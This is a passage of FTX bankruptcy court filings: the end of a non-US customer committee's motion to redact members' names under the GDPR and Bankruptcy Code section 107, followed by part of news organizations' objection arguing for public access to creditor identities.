29.     The GDPR protects all European Union member countries' citizens and imposes significant constraints on the "processing" of "personal data" relating to these individuals.  The GDPR applies to the processing of "personal data" of covered citizens by a "data controller" regardless of where the processing takes place.  GDPR, Art. 3. The GDPR broadly defines "personal data" as "any information relating to an identified or identifiable living ('data subject'); an identifiable natural person is one who can be identified, directly or indirectly . . . ."  GDPR, Art. 4(1).  "[P]rocessing" is broadly defined as "any operation or set of operations which is performed on personal data or on sets of personal data, whether or not by automated means, such as collection,

---

[7]     *See, e.g.*, Mack DeGeurin, *New Tool Shows the Biggest Losers in the Celsius Crypto Meltdown*, Gizmodo (Oct. 10, 2022), https://gizmodo.com/crypto-celsius-1849637951.

**A0180**

recording, organization, structuring, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, restriction, erasure or destruction of personal data by 'data controllers.'" GDPR, Art. 4(2).

30.     A "data controller" means a "natural or legal person, public authority, agency or **other body** which . . . determines the purposes and means of the processing of personal data." GDPR, Art. 4(7).  Here, the Ad Hoc Committee is a "data controller," having received "personal data" relating to citizens covered by the GDPR, and the Ad Hoc Committee's counsel currently holds or otherwise processes such "personal data" solely on the Members' instructions.

31.     Any violation of the GDPR could result in severe fines.  Breach of the GDPR could subject the Ad Hoc Committee to a fine up to the higher of €10,000,000 or 2 percent of worldwide annual turnover of the preceding financial year.  *See* GDPR, Art. 83(5).

32.     Courts in this District have recognized the potential consequences for breaching non-U.S. privacy laws and have authorized redactions designed to ensure compliance therewith. For example, in *Forever 21*, Judge Gross found that it was not necessary to disclose the personally identifiable information of the debtors' stakeholders who are citizens of the European Union. Specifically, Judge Gross noted:

> But I'll say the GDPR contains a necessity test in its guidelines. Is disclosure necessary for the legal proceedings at hand?
>
> Clearly, disclosing home addresses is not necessary for the conduct of the bankruptcy case and the absence of the address does not prejudice anyone; indeed, there's been no objection from any creditor in this case.
>
> Finally, if a party needs home addresses for an employee and the foreign citizens and has a valid purpose, they can reach out to the debtors to seek authority from the Court, upon establishing their

> *bona fides*, and, accordingly, the debtors' motion will be granted to
> redact the home addresses.

Hr'g Tr. at 62:16–25, 63:1–3, *In re Forever 21, Inc.*, No. 19-12122 (KG) (Bankr. D. Del. Dec. 19,

2019) (granting a motion to redact names and addresses of individuals covered by the GDPR).

33.      In fact, several courts in this District have granted motions to redact personally

identifying information of individuals covered by foreign data protection laws.  *See, e.g.*, *In re

Akorn, Inc.*, No. 20-11177 (KBO), at ¶ 4 (Bankr. D. Del. May 22, 2020) [D.I. 74] (authorizing

redaction of names and addresses of "individuals protected by the GDPR"); *In re VIVUS, Inc.*, No.

20-11779 (LSS) (Bankr. D. Del. July 10, 2020) [D.I. 66] (same); *In re Brooks Bros. Grp., Inc.*,

No. 20-11785 (CSS) (Bankr. D. Del. July 10, 2020) [D.I. 107] (same).  Moreover, such relief has

been granted over the objection of the United States Trustee.  *See, e.g.*, *In re Alpha Latam Mgmt.,

LLC*, No. 21-11109 (JKS) (Bankr. D. Del. Sept. 2, 2021) [D.I. 159] (overruling the U.S. Trustee's

objection and authorizing redactions based on a Colombian data protection law).

34.      Accordingly, it is appropriate to authorize the Ad Hoc Committee to redact the

Personally Identifying Information from the Rule 2019 Statement under section 107(c).

## C.  The Identities of the Entities Should be Sealed Under Section 107(b) of the Bankruptcy Code Because an Entity's Mere Presence on the FTX.com Platform Constitutes Confidential Commercial Information.

35.      Section 107(b) provides that "[o]n request of a party in interest, the bankruptcy court

shall . . . protect an entity with respect to a trade secret or confidential research, development, or

commercial information."  11 U.S.C. § 107(b)(1).

36.      Once the Bankruptcy Court determines that an entity is seeking protection of

information that falls within one of the categories enumerated in section 107(b) of the Bankruptcy

Code, such as confidential commercial information, "the court is required to protect a requesting

interested party and has no discretion to deny the application."  *Orion Pictures*, 21 F.3d at 27;

*accord In re Global Crossing, Ltd.*, 295 B.R. 720, 723 n.7 (Bankr. S.D.N.Y. 2003). Moreover, the movant is not required to demonstrate "good cause" to file the relevant document(s) under seal pursuant to section 107(b). *Orion Pictures*, 21 F.3d at 27.

37.     Courts have defined "confidential commercial information" to mean (i) "important proprietary information" that the entity "has historically sought to maintain the confidentiality of [such] information," *Innovative Therapies, Inc. v. Meents*, 302 F.R.D. 364, 380 (D. Md. 2014) (defining "confidential commercial information" under Fed. R. Civ. P. 45(d)(3)(B)(I)), or (ii) information that would "result in an 'unfair advantage to competitors by providing them with information as to the commercial operations of the [entity],'" *In re Alterra Healthcare Corp.*, 353 B.R. 66, 75 (Bankr. D. Del. 2006) (quoting *Orion Pictures*, 21 F.3d at 27–28). "The whole point of [section 107(b)] is to protect business entities from disclosure of information that could reasonably be expected to cause the entity commercial injury." *Global Crossing*, 295 B.R. at 725.

38.     Commercial information does not need to rise to the level of a trade secret to be protected under section 107(b) of the Bankruptcy Code. *Orion Pictures*, 21 F.3d at 28. It need only be confidential and commercial in nature. *See id.* (noting that an interested party must show only that the information to be sealed is "confidential and commercial" in nature).

39.     Here, the Entities' names qualify as "confidential commercial information" because the Members' relationship with FTX.com is confidential. As detailed in the Member Declaration, the FTX.com platform had commercial appeal to its customers because customers were able to hold and trade assets on the platform with general anonymity—a unique feature that the Members relied on when depositing their assets on the platform. Member Declaration at ¶ 4. The Terms of Service for FTX.com included a Privacy Policy that generally restricted the Debtors' ability to disclose customer information to third parties other than the Debtors' service providers, business

15

A0183

partners, and affiliates. **Exhibit C** § 3. Nothing in the Privacy Policy suggested that the customers' information would ever be available to the public. The Privacy Policy was a critical condition that many FTX.com customers, including the Members, relied upon when they deposited their digital assets on the Debtors' platform. Member Declaration at ¶ 4. The Members' reliance on the Privacy Policy demonstrates that their presence on the FTX.com platform is "important proprietary information" and that they have "historically sought to maintain the confidentiality of [such] information." *Innovative Therapies*, 302 F.R.D. at 380. The Members should not be required to waive their contractual right to confidentiality as a condition of their participation in these bankruptcy cases to recover their stolen assets.

40. Relatedly, if this Motion is not granted, any goodwill remaining with the Debtors and the value of the FTX.com platform would be further eroded. Because the Members relied on the Debtors' commitment to maintain the confidentiality of the Members' activity on the FTX.com platform, compelling the Members, and similarly situated FTX.com customers, to now publicly disclose themselves to participate in the bankruptcy case would dilute any remaining reorganizational value of the FTX.com platform by further diminishing (if not destroying) the customer relationships that built the platform. *See* Jan. 11, 2023 Hr'g Tr. 8:11–14 (counsel to the Debtors explaining that the Debtors are still exploring a potential reorganization of the Debtors' "international platform"). As a result, compelling FTX.com customers to publicly disclose their identities would result in potentially significant loss of the Debtors' enterprise value to the detriment of all stakeholders.

**D. Alternatively, "Cause" Exists to Redact the Entities' Names from the Rule 2019 Statement Pursuant to Rule 9037(d) of the Federal Rules of Bankruptcy Procedure.**

41. In the event that this Court finds that section 107(b) does not justify sealing the Entities' names, then this Court should nonetheless authorize the Ad Hoc Committee to seal the

Entities' names under Bankruptcy Rule 9037(d). Bankruptcy Rule 9037(d) provides that the Court may, "for cause . . . require redaction of additional information." Fed. R. Bankr. P. 9037(d); *see also In re Blake*, 452 B.R. 1, 10 (Bankr. D. Mass. 2011) ("Before prohibiting public disclosure of information not delineated in the Bankruptcy Code or Rules, [ ] the bankruptcy court must first determine that cause has been established [under Bankruptcy Rule 9037(d)].").

42. For the reasons stated in the Philips Declaration, cause exists to redact the Entities' names in the Rule 2019 Statement because the risks associated with disclosure of the Personally Identifying Information are equally applicable to disclosure of the Entities' names. Requiring the Entities to disclose their names is tantamount to handing thieves a list of businesses to rob. *See* Philips Declaration at ¶ 14. Sophisticated criminals can rely on any business account holder's name to identify individual persons associated with the business, whether they be employees, directors and officers, or equity holders. *See id.* Upon identification, the bad actors are able to target those individuals in many of the previously discussed ways that thieves target individual cryptocurrency holders. *See supra* ¶ 25. Compelling disclosure of the Entities' names on FTX.com would subject the Entities to an undue risk of "unlawful injury." Philips Declaration at ¶ 14. The Ad Hoc Committee submits that this risk of unlawful injury constitutes "cause" that warrants redaction of the Entities' names under Bankruptcy Rule 9037(d).

43. Accordingly, this Court should authorize the Ad Hoc Committee to redact the Entities' names in the Rule 2019 Statement pursuant to section 107(b) of the Bankruptcy Code or Bankruptcy Rule 9037(d).

## CONCLUSION

44. For the foregoing reasons, under the unique circumstances of these chapter 11 cases, it is appropriate for the Court to authorize the Ad Hoc Committee to redact the Sealed Information

from the Rule 2019 Statement.  If the Court denies any portion of the relief requested in this Motion, then the Ad Hoc Committee shall (i) file a supplemental Rule 2019 Statement within 10 days of entry of an order denying the relief requested in this Motion and (ii) provide its Members with the opportunity to withdraw from the Ad Hoc Committee.

## NOTICE

45.     Notice of this Motion will be provided to (i) the U.S. Trustee; (ii) counsel to the Debtors; (iii) counsel to the Official Committee of Unsecured Creditors; and (iv) any other party entitled to notice pursuant to Bankruptcy Rule 2002.  In light of the nature of the relief requested herein, the Ad Hoc Committee submits that no other or further notice is necessary.

## CONCLUSION

WHEREFORE, the Ad Hoc Committee respectfully requests that this Court (i) grant this Motion and the relief requested herein; (ii) enter the Proposed Order attached hereto as **Exhibit A**; and (iii) grant such other and further relief as it deems just and proper.

*[Remainder of Page Intentionally Left Blank.]*

18

Date: March 22, 2023
Wilmington, Delaware

*/s/ Eric D. Schwartz*
**MORRIS, NICHOLS, ARSHT & TUNNELL LLP**
Eric D. Schwartz (No. 3134)
Matthew B. Harvey (No. 5186)
Paige N. Topper (No. 6470)
1201 North Market Street, 16th Floor
Wilmington, Delaware 19801
Telephone: (302) 658-9200
Facsimile: (302) 658-3989
eschwartz@morrisnichols.com
mharvey@morrisnichols.com
ptopper@morrisnichols.com

-AND-

**EVERSHEDS SUTHERLAND (US) LLP**
Peter A. Ivanick
Sarah E. Paul
The Grace Building, 40th Floor
1114 Avenue of the Americas
New York, New York 10036
Telephone: (212) 389-5000
Facsimile: (212) 389-5099
peterivanick@eversheds-sutherland.com
sarahpaul@eversheds-sutherland.com

-and-

Erin E. Broderick
227 West Monroe Street, Suite 6000
Chicago, Illinois 60606
Telephone: (312) 724-9006
Facsimile: (312) 724-9322
erinbroderick@eversheds-sutherland.com

-and-

David A. Wender
Nathaniel DeLoatch
999 Peachtree St NE
Atlanta, Georgia 30309
Telephone: (404) 853-8000
Facsimile: (404) 853-8806
davidwender@eversheds-sutherland.com
nathandeloatch@eversheds-sutherland.com

*Counsel to the Ad Hoc Committee of Non-US
Customers of FTX.com*

19

**A0187**

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

|  |  |
|---|---|
| In re<br><br>FTX TRADING LTD., *et al.*,<br><br>Debtors. | Chapter 11<br>Case No. 22-11068-JTD<br>(Jointly Administered)<br><br>Re: 1137<br><br>Objection Deadline:<br>April 5, 2023 at 4:00 p.m. (ET)<br><br>Hearing Date:<br>April 12, 2023 at 1:00 p.m. (ET) |

## MEDIA INTERVENORS' OBJECTIONS TO (I) MOTION OF THE AD HOC COMMITTEE OF NON-US CUSTOMERS TO FILE UNDER SEAL A VERIFIED STATEMENT AND DECLARATION (D.I. 1137), AND (II) EXTENSION OR CONTINUANCE OF THE REDACTION DEADLINE

Media Intervenors—Bloomberg L.P., Dow Jones & Company, Inc., The New York Times Company and The Financial Times Ltd—hereby object to (1) the motion of the Ad Hoc Committee of Non-US Customers (herein the "Committee") to file under seal its Rule 2019 Statement and the declaration of one of its members, D.I. 1137; and (2) any extension or continuance of the 90-day period during which the Court has permitted the names of FTX's customer-creditors to remain sealed in Debtors' filings, D.I. 545.[1]

## BACKGROUND

1.    On November 11, 2022, Debtors petitioned for relief under Chapter 11 of the Bankruptcy Code.  D.I. 1. On November 19, 2022, Debtors moved for leave to file a consolidated Creditor Matrix containing the names and addresses of their creditors.  D.I. 45 at 3–4, ¶ 6.

---

[1] FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers are 3288 and 4063, respectively. Due to the large number of debtor entities in these Chapter 11 cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

Simultaneously, Debtors sought leave pursuant to 11 U.S.C. § 107(b)(1) to redact the names and addresses of their customers in all publicly filed versions of the Creditor Matrix and Consolidated Top 50 Creditors List and Schedules and Statements.  D.I. 45 at 5–6, ¶ 12.

2.  On December 9, 2022, Media Intervenors moved to intervene for the limited purpose of opposing the redaction of the creditors' names. Media Intervenors' motion set forth their objections to Debtors' proposed redactions.  D.I. 196.

3.  On December 12, 2022, the U.S. Trustee filed objections to, in relevant part, Debtors' proposed redaction of their creditors' names.  D.I. 200.

4.  On December 19, 2022, the Court granted Media Intervenors' motion to intervene. D.I. 255.

5.  On January 8, 2023, Debtors filed a reply to the objections of Media Intervenors and the U.S. Trustee.  D.I. 407. In support, Debtors proffered the declaration of Kevin M. Cofsky (the "Cofsky Declaration").  D.I. 411. On reply, Debtors limited their request to seal the names of *some* creditors to a period of six months, subject to extension.  D.I. 407 at 5, ¶ 10. Debtors maintained, however, their request to permanently redact the names of customers "who are citizens of countries protected by the GDPR."[2]  *Id.* at ¶ 30.

6.  On January 11, 2023, the Court held a hearing (the "Second Day Hearing") on, *inter alia*, Debtors' request to redact the names of their customers, at which the Court heard testimony from Mr. Cofsky. D.I. 489. On January 20, 2023, the Court entered an order (the "Redaction Order") granting final relief as to some portions of Debtors' sealing request and interim relief as to other portions.  D.I. 545. The Court authorized Debtors "to redact the addresses and email

---

[2] Debtors also sought to "reserve all rights with respect to seeking to permanently redact names of creditors who are citizens of other countries with similar laws if subsequently advised by counsel to be necessary."  D.I. 407 at 12 n.9.

addresses of their creditors and equity holders who are natural persons from any filings." *Id.* at ¶ 5. The Court also authorized Debtors, pursuant to 11 U.S.C. § 107(b)(1), to redact the names of "all customers," and the "addresses and email addresses of customers who are not natural persons," for a period of 90 days—*i.e.*, until April 20, 2023 (the "Redaction Deadline"). D.I. 545 ¶ 4. Finally, the Court authorized Debtors to redact the names and addresses of "any creditors or equity holders" who are "natural persons and who are protected by the GDPR" until the Redaction Deadline. *Id.* at ¶ 6.

7.    On March 22, 2023, the Committee moved to file under seal (1) the statement required by Rule 2019 of the Federal Rules of Bankruptcy Procedure (the "Rule 2019 Statement"); and (2) a declaration prepared by one of the Committee's members in support of sealing the Committee's Rule 2019 statement (the "Member Declaration"). D.I. 1137. By its motion, the Committee sought the Court's leave to redact the names of its members from the Committee's Rule 2019 Statement.

8.    Additionally, in support of its motion to seal its Rule 2019 Statement, the Committee filed a declaration prepared by Philip James, D.I. 1139, referred to in its motion as the "Philips Declaration." *See* D.I. 1137 ¶ 2.

9.    The Committee proffered no other evidence in support of sealing the Member Declaration.

10.    Objections to the Committee's motion to seal are due by 4:00 P.M. on April 5, 2023; a hearing on the motion is set for 1:00 P.M. on April 12, 2023. D.I. 1137.

11.    On March 24, 2023, the Committee publicly filed redacted versions of its Rule 2019 statement, D.I. 1156, and the Member Declaration, D.I. 1157.

## ARGUMENT

12.    The First Amendment to the Constitution of the United States and the Bankruptcy Code guarantee the press and public a presumptive right of access to bankruptcy filings. Litigants

who seek to overcome the public's right of access to bankruptcy filings and seal information that is presumptively public bear a heavy burden to justify such secrecy. Here, Debtors previously sought to seal the names of all creditors who are also customers of FTX Trading Ltd. ("FTX"), prompting entry of the Redaction Order; the Committee, for its part, now seeks to seal the names of all of its members, a group of "non-U.S." customer-creditors. Debtors and the Committee— who rely on substantially overlapping arguments and evidence—have failed to carry their burden to justify continued sealing. In particular, the evidence they rely on fails to establish that the names of FTX's customer-creditors constitute confidential commercial information under § 107(b)(1) and fails to establish that disclosing the names of FTX's individual customer-creditors would expose those individuals to an "undue risk of identity theft or other unlawful injury" pursuant to § 107(c).

13. As detailed herein, the purported justifications for sealing the names of the Committee members, like Debtors' proffered justifications for sealing their entire list of both institutional and individual creditors, are so broad that they elude any limiting principle; if permanent sealing of the names of bankruptcy participants were permissible on the grounds advanced by Debtors and the Committee, then sealing customers' names would be routine in virtually every bankruptcy proceeding—a result wholly incompatible with the public's long-recognized constitutional and statutory rights of access to bankruptcy filings.

14. Public access is of the utmost importance here. The seismic collapse of FTX, and the catastrophic losses suffered by millions of its customers, has ignited intense public interest in the U.S. legal system's approach to the burgeoning and largely unregulated cryptocurrency market— with this case at the center. Yet the sealing of the names of FTX's creditors to date has significantly impeded reporting on, and analysis of, these proceedings, leaving the public—and creditors—

largely in the dark as to the United States' enforcement of its bankruptcy laws in the crypto context. This undermines a bedrock purpose of the strong presumption of public access applicable in bankruptcy matters: to "foster[] confidence among creditors regarding the fairness of the bankruptcy system." *In re Crawford*, 194 F.3d 954, 960 (9th Cir. 1999).

15. Even to the extent temporary sealing, as provided for in the Redaction Order, was appropriate at the outset of this case, additional and ongoing sealing is not warranted. Months have passed since the Redaction Order. The Redaction Deadline is approaching, but Debtors have yet to proffer additional evidence in support of continued redaction, and the Committee's arguments for further sealing fall far short. In the meantime, the press, members of the public, and other creditors remain stymied in their efforts to monitor these proceedings.

16. Accordingly, and for the reasons herein, the Court should (1) deny the Committee's motion to redact the names of its members in its Rule 2019 Statement and (2) decline to extend or continue the Redaction Deadline.

## A. BANKRUPTCY PROCEEDINGS ARE PRESUMPTIVELY PUBLIC, AND PROPONENTS OF SEALING BEAR A HEAVY EVIDENTIARY BURDEN.

17. A strong presumption of openness applies to all judicial records. *See Nixon v. Warner Commc'n, Inc.*, 435 U.S. 589, 597–98 (1978). This presumption "is at its zenith when issues concerning the integrity and transparency of bankruptcy court proceedings are involved." *In re Food Mgmt. Grp., LLC*, 359 B.R. 543, 553 (Bankr. S.D.N.Y. 2007). Thus, "[d]uring a chapter 11 reorganization, a debtor's affairs are an open book, and the debtor operates in a fish bowl." *In re Alterra Healthcare Corp.*, 353 B.R. 66, 73 (Bankr. D. Del. 2006). This openness is "fundamental to the operation of the bankruptcy system and is the best means of avoiding any suggestion of impropriety that might or could be raised." *In re Bell & Beckwith*, 44 B.R. 661, 664 (Bankr. N.D. Ohio 1984).

18.  The presumption of public access is particularly strong when, as here, the public has a heightened interest in the subject matter of the proceedings. *See, e.g., In re Nat'l Prescription Opiate Litigation*, 927 F.3d 919, 933 (6th Cir. 2019) (outside the bankruptcy context, requiring disclosure of a database subject to a stipulated protective, given the public's "substantial interest" in the data). *See also* D.I. 196 ¶¶ 1–3 (describing public interest in the present matter).

19.  Section 107 of the Bankruptcy Code, which codifies the presumption of public access, "is rooted in . . . the common law and buttressed by the First Amendment." *Crawford*, 194 F.3d at 960. While the statute contains certain enumerated exemptions, 11 U.S.C. § 107(b)–(c), bankruptcy "[c]ourts have zealously upheld the public's right to access and narrowly construed the[m]." *In re Celsius Network, LLC*, 644 B.R. 276, 288 (Bankr. S.D.N.Y 2022) (citing *In re Anthracite Cap., Inc.*, 492 B.R. 162, 176 (Bankr. S.D.N.Y. 2013)).  The provision reflects the clear intent of Congress to make all records in bankruptcy cases publicly available in all but specific, narrow circumstances.  *In re Orion Pictures Corp.*, 21 F.3d 24, 26 (2d Cir. 1994).  "That information might 'conceivably' or 'possibly' fall within a protected category is not sufficient to seal documents." *In re FiberMark, Inc.*, 330 B.R. 480, 506 (Bankr. D. Vt. 2005).

20.  Parties seeking to file bankruptcy records under seal bear a heavy evidentiary burden. *Celsius*, 644 B.R. at 292 ("The strong public policy of transparency and public disclosure in bankruptcy cases requires very narrow exceptions and only on strong evidentiary showings."). Conclusory statements that a debtor will be harmed by the disclosure of presumptively public information do not satisfy this burden.  *E.g., In re Itel Corp.*, 17 B.R. 942, 943-944 (Bankr. 9th Cir. 1982); *In re Purdue Pharma LP*, 632 B.R. 34, 40 (Bankr. S.D.N.Y. 2021) (holding that a "request under § 107(b)(1) should be supported by specific evidence, not argument or conclusory

statements in a declaration, to establish the exception"). Instead, the moving party must provide specific, particularized evidence of harm that rises above mere speculation. *See id.*

21. Opponents of sealing—including members of the press and public—must have the opportunity to challenge any evidence adduced by the proponents of sealing, including the opportunity to cross-examine declarants. *See*, *e.g.*, *Purdue Pharma,* 632 B.R. at 40 (giving media intervenors "the opportunity to cross-examine Messrs. Lynam and Vellucci on their Declarations at an evidentiary hearing"); *United States v. Timon*, 2021 WL 276964 at *2 (N.D.N.Y. Jan. 7, 2021) (denying a party's motion seeking permission for witness testimony to be presented by declaration in lieu of live testimony, as it would "deprive Defendants the opportunity to cross-examine these witnesses"). "In order for a declaration to be considered by the Court, the declarant must be in court, subject to cross-examination at the trial." *In re Heckencamp*, 110 B.R. 1, 3 (Bankr. C.D. Cal. 1989). Absent such an "opportunity to confront a declarant the evidence is inadmissible." *In re Shangri-La Nursing Center, Inc.*, 31 B.R. 367, 370 (Bankr. E.D.N.Y. 1983); *see also In re DBSI, Inc.*, 405 B.R. 698, 704 (Bankr. D. Del. 2009) (declining to consider the declaration of a declarant whom the opposing party was not provided an opportunity to cross-examine).

22. Significant here, the strong presumption of public access to bankruptcy proceedings attaches to the identities of creditors. 11 U.S.C. § 521(a) ("The debtor shall file a list of creditors."); Fed. R. Bankr. P. 1007(a) ("[T]he debtor shall file with the petition a list containing the name and address of each entity included or to be included on Schedules D, E/F, G, and H."). Indeed, courts have recognized that public access to creditor lists in bankruptcy proceedings is especially important because, *inter alia*, conferral among creditors is an integral part of the Chapter 11 reorganization process, and such conferral is frustrated when creditors' identities are sealed.

*See In re Foundation for New Era Philanthropy*, 1995 WL 478841, *6 (Bankr. E.D. Pa. 1995). *See also In re MorAmerica Financial Corp.*, 158 B.R. 135, 137 (Bankr. N.D. Ia. 1993) ("An open record…enhances the likelihood that creditors will confer among themselves as to their best alternatives in this reorganization case. The ability to campaign among one's fellow creditors is an important ability in a bankruptcy case. Sealing of creditor lists inhibits that ability.").

23.  Indeed, the docket in this matter reveals several examples of immense transfers of funds involving anonymized creditors (who may or may not be members of the Committee):

Case 22-11068-JTD   Doc 1025   Filed 03/15/23   Page 43 of 65

Debtor Name:  Alameda Research LLC                                                Case Number: 22-11066 (JTD)

**Statement of Financial Affairs for Non-Individuals Filing for Bankruptcy**

**SOFA Question 3:** Certain payments or transfers to creditors within 90 days before filing this case

| Creditor Name & Address | Check or Wire Number | Payment Date | Reason For Payment | Amount Paid |
|---|---|---|---|---|
| | | 10/19/2022 | Services | $94,517.43 |
| | | 10/21/2022 | Services | $627.27 |
| | | 11/07/2022 | Services | $6,567.80 |
| | | | **SUBTOTAL** | **$433,968.58** |
| NAME ON FILE ADDRESS ON FILE | | 08/16/2022 | Other- Loan Principal and/or Interest | $180,000,000.00 |
| | | | **SUBTOTAL** | **$180,000,000.00** |

8

**A0195**

Debtor Name: Alameda Research LLC

Case Number: 22-11066 (JTD)

**Statement of Financial Affairs for Non-Individuals Filing for Bankruptcy**

SOFA Question 13: Transfers not already listed on this statement

| Creditor Name and Address | Description of Property | Relationship to Debtor | Date | Amount |
|---|---|---|---|---|
| Bankman-Fried, Samuel<br>ADDRESS ON FILE | Cash Payment | Founder | 01/05/2021 | $500,000.00 |
| Bankman-Fried, Samuel<br>ADDRESS ON FILE | Cash Payment | Founder | 01/15/2021 | $500,000.00 |
| Friedberg, Daniel<br>ADDRESS ON FILE | Cash Transfer | Officer | 06/15/2021 | $3,007,451.30 |
| NAME ON FILE<br>ADDRESS ON FILE | Cash Transfer in the name of<br>Samuel Bankman-Fried | | 10/01/2021 | $20,000,000.00 |
| Mount Olympus Capital LP<br>9 LAGORCE CIR<br>MIAMI BEACH, FL 33141-4519 | Cash Investment in Mount<br>Olympus Capital LP for the benefit<br>of SGN Albany (100% owned by<br>Sam, Gary, Nishad, and Alameda<br>Research Ltd.) | | 06/07/2022 | $100,000,000.00 |
| NAME ON FILE<br>ADDRESS ON FILE | Cash Transfer in the name of<br>Nishad Singh | | 08/16/2021 | $1,000,000.00 |
| NAME ON FILE<br>ADDRESS ON FILE | Cash Transfer in the name of<br>Samuel Bankman-Fried | | 06/16/2021 | $1,000,000.00 |
| NAME ON FILE<br>ADDRESS ON FILE | Cash Transfer in the name of<br>Samuel Bankman-Fried | | 07/20/2021 | $2,000,000.00 |

Responses to this question do not currently include all transfers of cryptocurrency, other digital assets or other assets.

Debtor Name:  FTX Trading Ltd.

Case Number:  22-11068 (JTD)

**Statement of Financial Affairs for Non-Individuals Filing for Bankruptcy**

SOFA Question 4: Payments or other transfers of property made within 1 year before filing this case that benefited any insider

| Creditor Name and Address | Relationship to Debtor | Total Amount or Value | Dates | Reason for Payment or Transfer |
|---|---|---|---|---|
| Corporate & Trust Services<br>Limited<br>LOWER FACTORY ROAD PO<br>BOX 990<br>ST JOHNS,<br>ANTIGUA & BARBUDA | Director | $20,833.33 | 12/17/2021 | Cash Payment |
| Corporate & Trust Services<br>Limited<br>LOWER FACTORY ROAD PO<br>BOX 990<br>ST JOHNS,<br>ANTIGUA & BARBUDA | Director | $20,833.33 | 11/15/2021 | Cash Payment |
| Ellison, Caroline<br>ADDRESS ON FILE | Director/Officer | $500,000.00 | 01/20/2022 | Cash Payment |
| Ellison, Caroline<br>ADDRESS ON FILE | Director/Officer | $1,000,000.00 | 01/12/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Officer | $5,000,000.00 | 09/09/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Officer | $3,750,000.00 | 05/27/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Officer | $15,973,337.50 | 05/05/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Officer | $17,360,000.00 | 04/13/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Officer | $41,666,671.88 | 11/23/2021 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Director | $844,662.00 | 04/13/2022 | Cash Payment |
| NAME ON FILE<br>ADDRESS ON FILE | Director | $49,989.36 | 07/21/2022 | Cash Payment |

9

**A0196**

24.  As a result of this sealing, not only are members of the press and public unable to scrutinize these transactions—other creditors are unable to inquire with their fellow creditors about the nature of these transfers, underscoring that some creditors stand to benefit tremendously from sealing, while others, benefitting little, are left in the dark.  Continued sealing, including the names of the Committee members, will only compound these harms.

**B.**  **NEITHER THE COMMITTEE NOR DEBTORS HAVE ESTABLISHED THAT CONTINUED SEALING IS PERMISSIBLE UNDER SECTION 107(B)(1).**

  **i.**  **Debtors' proffered evidence, on which the Committee largely relies, does not establish that the names of FTX's customers constitute confidential commercial information.**

25.  Section 107(b)(1) permits a court to protect information constituting "a trade secret or confidential research, development, or commercial information."  11 U.S.C. § 107(b)(1). "Commercial information" means "information which would cause 'an unfair advantage to competitors by providing them information as to the commercial operations of the debtor.'" *Celsius,* 644 B.R. at 288. Commercial information need not be a trade secret, but it must be "so critical to the operations of an entity seeking the protective order that its disclosure will unfairly benefit the entity's competitors."[3]  *Id.* at 289 (quoting *In re Barney's Inc.*, 201 B.R. 703, 708-09

---

[3] The Committee contends that this Court has already "ruled that the names of the Debtors' customers may remain sealed from public view pursuant to § 107(b) of the Bankruptcy Code because the customers' identities qualify as a 'trade secret' of the Debtors." D.I. 1337 ¶ 10 (citing Tr. of Second Day Hrg. 102:25–103:5). That is misleading. In context, the Court's statement simply acknowledges that, in the bankruptcy context, it goes without saying that a company may be able to prove that their customer list is protected under § 107(b).  Tr. of Second Day Hrg. 102:25–103:5. But that general observation does not speak to the specific circumstances here, in which all customers are also creditors.  *Id.* Indeed, Debtors have not argued that the names of FTX's customers are trade secrets. *See generally* D.I. 45, D.I. 405. And the Redaction Order, which permitted only *temporary* redaction of customer names, not only contains no reference to trade secrets, *see generally* D.I. 545, but would make little sense if the Court had, in fact, made the finding the Committee says it did.

(Bankr. S.D.N.Y. 1996). *See also Alterra*, 353 B.R. at 75–76. In addition, disclosure must "reasonably be expected to cause the entity commercial injury." *Id.* at 75.

26. Here, Debtors' evidence in support of sealing the names of their customer-creditors consists of the testimony of Mr. Cofsky.[4] The Committee seeks to redact the names of its members based on the same evidence. *See* D.I. 1137 ¶ 18 ("There is no basis to deny the [Committee] the same relief that the Court has already granted to the Debtors.").[5]

27. The Court deemed Debtors' evidence sufficient to justify sealing the names of FTX's customer-creditors for 90 days—a period calculated to maintain the status quo while Debtors explored potential valuations of FTX's assets. D.I. 545. Debtors' evidence is not, however, sufficient to justify *ongoing* sealing, beyond that 90-day redaction period.

28. During the Second Day Hearing, Mr. Cofksy testified that his staff had selected fewer than 20 FTX customer-creditors with non-generic names and run unspecified internet searches for information about them. Mr. Cofsky's staff believed they were able to locate some unspecified form of contact information for more than half of the customer-creditors thus searched. Tr. of Second Day Hrg. 33:19–36:3. Mr. Cofsky did not testify that he or his staff validated the results of this experiment—*e.g.*, by determining whether they had located accurate, current contact

---

[4] The Declaration of Edgar W. Mosley II in Support of Chapter 11 Petitions and First Day Pleadings ("Mosley Declaration"), D.I. 57, contains two paragraphs regarding the sealing of FTX's customers list. *Id.* ¶¶ 18–19. To Media Intervenors' knowledge, no party has cited either paragraph in support of sealing the names of FTX's customers—appropriately so, as paragraphs 18 and 19 are entirely conclusory. *Id.*; *see also* D.I. 200 (explaining that paragraphs 18 and 19 of the Mosley Declaration provide no support for sealing under § 107).

[5] The Committee incorrectly states that the Court has already permitted Debtors to redact the names of all FTX customers who are natural persons on a *permanent* basis, while permitting redaction of the names of customers who are *not* natural persons only until the Redaction Deadline. D.I. 1137 ¶ 11. The Redaction Order clearly states that "the authorization to redact the names of *all customers*, and to redact the names, addresses and e-mail addresses of customers who are not natural persons, is only until [the Redaction Deadline]." D.I. 545 ¶ 4 (emphasis added).

information for the individuals they had searched, or whether they had, in fact, located contact information for the *correct* individuals. *See id*.

29. Nevertheless, based on this experiment, Mr. Cofksy speculated that if FTX's customer-creditors' names were disclosed, competitors might conduct similar searches and use the results to woo FTX's customers, thereby reducing the value of Debtors' estate. *Id.*

